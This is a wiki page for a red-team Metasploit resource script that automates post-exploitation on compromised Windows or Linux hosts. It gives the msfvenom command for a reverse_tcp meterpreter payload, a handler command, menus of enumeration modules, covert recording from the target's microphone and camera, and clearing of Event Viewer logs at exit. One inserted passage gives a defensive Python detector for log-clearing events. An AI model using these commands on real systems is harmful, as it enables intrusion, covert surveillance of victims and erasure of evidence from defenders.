
post_exploitation.rc | offensive resource script

pedro ubuntu edited this page Apr 24, 2019 · 64 revisions


Description

Resource file to automate/assist in session post-exploitation tasks.
This script displays a menu of commands based on the session platform (Windows or Linux).
It also queries the framework database for the session ID so that it can run post modules against it.
It also allows us to automatically launch multiple msf post modules against the target session.

Example of commands being executed using [Command]: gather

localtime
sysinfo
getuid
run post/windows/gather/checkvm
webcam_list
run post/multi/gather/wlan_geolocate
run post/windows/gather/enum_shares
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_computers
run post/windows/gather/enum_applications
enumdesktops
show_mount
run post/windows/recon/enum_protections
unsetg all
unset all

This script can be reviewed here


Remark

'This script can NOT be run in the meterpreter prompt because ERB code is not accepted there'
'On Windows platforms the script will clean target Event Viewer artifacts (logs) at exit'
'If no value (setg) has been provided (before execution) then this script will use its own default values'
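
For defenders, the log clean-up mentioned in the remark above is itself observable: when a log is cleared through the Windows event log service, the Microsoft-Windows-Eventlog provider records event 1102 (Security log cleared) or event 104 (another log cleared). The following Python sketch is an added example, not part of post_exploitation.rc or this wiki; it flags hosts where several logs are cleared within a short window, and its sample events, host and user names, `make_event` helper and 60-second window are constructed assumptions.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
PROVIDER = "Microsoft-Windows-Eventlog"
CLEAR_IDS = {1102, 104}  # 1102: Security audit log cleared; 104: another log cleared

def make_event(eid, when, host, user, cleared=None, provider=PROVIDER):
    log = "Security" if eid == 1102 else "System"  # log the record is written to
    data = f"<SubjectUserName>{user}</SubjectUserName>"
    if cleared:  # event 104 names the cleared log in UserData
        data += f"<Channel>{cleared}</Channel>"
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="{provider}"/>'
            f'<EventID>{eid}</EventID><TimeCreated SystemTime="{when}"/>'
            f'<Channel>{log}</Channel><Computer>{host}</Computer></System>'
            f'<UserData><LogFileCleared>{data}</LogFileCleared></UserData></Event>')

SAMPLE = [  # constructed, simplified event XML (hypothetical hosts and users)
    make_event(104, "2019-04-24T10:15:01.000Z", "WS01", "labuser", "Application"),
    make_event(104, "2019-04-24T10:15:02.000Z", "WS01", "labuser", "System"),
    make_event(1102, "2019-04-24T10:15:03.000Z", "WS01", "labuser"),
    make_event(104, "2019-04-24T09:00:00.000Z", "WS02", "admin", "Application"),
]

def parse_clears(xml_events):
    clears = []
    for xml in xml_events:
        root = ET.fromstring(xml)
        system = root.find("e:System", NS)
        eid = int(system.findtext("e:EventID", namespaces=NS))
        if system.find("e:Provider", NS).get("Name") != PROVIDER or eid not in CLEAR_IDS:
            continue
        # Index by local name; a UserData Channel (104) overrides the System one
        f = {el.tag.rsplit("}", 1)[-1]: el for el in root.iter()}
        when = datetime.strptime(f["TimeCreated"].get("SystemTime")[:19], "%Y-%m-%dT%H:%M:%S")
        clears.append({"host": f["Computer"].text, "user": f["SubjectUserName"].text,
                       "channel": f["Channel"].text, "time": when})
    return clears

def clear_bursts(xml_events, window=timedelta(seconds=60), min_logs=2):
    """Hosts where >= min_logs distinct logs were cleared within `window`."""
    alerts, clears = [], sorted(parse_clears(xml_events), key=lambda c: c["time"])
    for first in clears:
        if any(a["host"] == first["host"] for a in alerts):
            continue  # one alert per host
        logs = sorted({c["channel"] for c in clears if c["host"] == first["host"]
                       and timedelta(0) <= c["time"] - first["time"] <= window})
        if len(logs) >= min_logs:
            alerts.append({"host": first["host"], "user": first["user"], "logs": logs})
    return alerts
```

On the constructed sample, only WS01 is reported; the single Application log clear on WS02 stays below the threshold. Forwarding these events to a central collector keeps them available even after the local logs are wiped.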

Settings available (before executing the script) - optional settings

msf > setg MSF_PATH /opt/metasploit-framework => (absolute path of metasploit-framework)
msf > setg REC_TIME 15 => (timeout in sec to record using target mic/camera)
REMARK: These global settings (setg) will be cleared every time the script ends execution.






1º - download project from github

git clone https://github.com/r00t-3xp10it/resource_files.git



2º - install all post_exploitation.rc dependencies

cd resource_files
cd aux
sudo chmod +x install.sh
sudo ./install.sh

The 'post_exploitation.rc' resource script requires 3 Metasploit post modules written by me to assist in post-exploitation tasks, from gathering information to persisting our payload on the target system, or using the freevulnsearch.nse Nmap NSE script (@Mathias Gut) to scan for possible CVEs present...

cd ..
sudo service postgresql start

3º - build msf payload (windows platforms)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=666 -f exe -o binary.exe



4º - start multi/handler

  msfconsole -q -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.11; set LPORT 666; exploit'




5º - copy binary.exe to target system and execute it.

REMARK: execute binary.exe with admin privs (execute as admin)



6º - when we receive the session.. (background meterpreter)..

meterpreter > background



7º - load post_exploitation.rc

msf > resource post_exploitation.rc



8º - run play_youtube command

[command]: play_youtube
[+] Input youtube URL: 35Yq7ae6F8E




More exercises


9º - load script again

msf > resource post_exploitation.rc



10º - run rec_target command

[command]: rec_target
[+] Record audio from target microphone? (y/n): yes
[+] Record video from target camera? (y/n): yes






Final Notes:

If we decide to use a Linux payload,
then this script will present a different 'commands menu' for Linux platforms.




Suspicious Shell Activity redteam @2019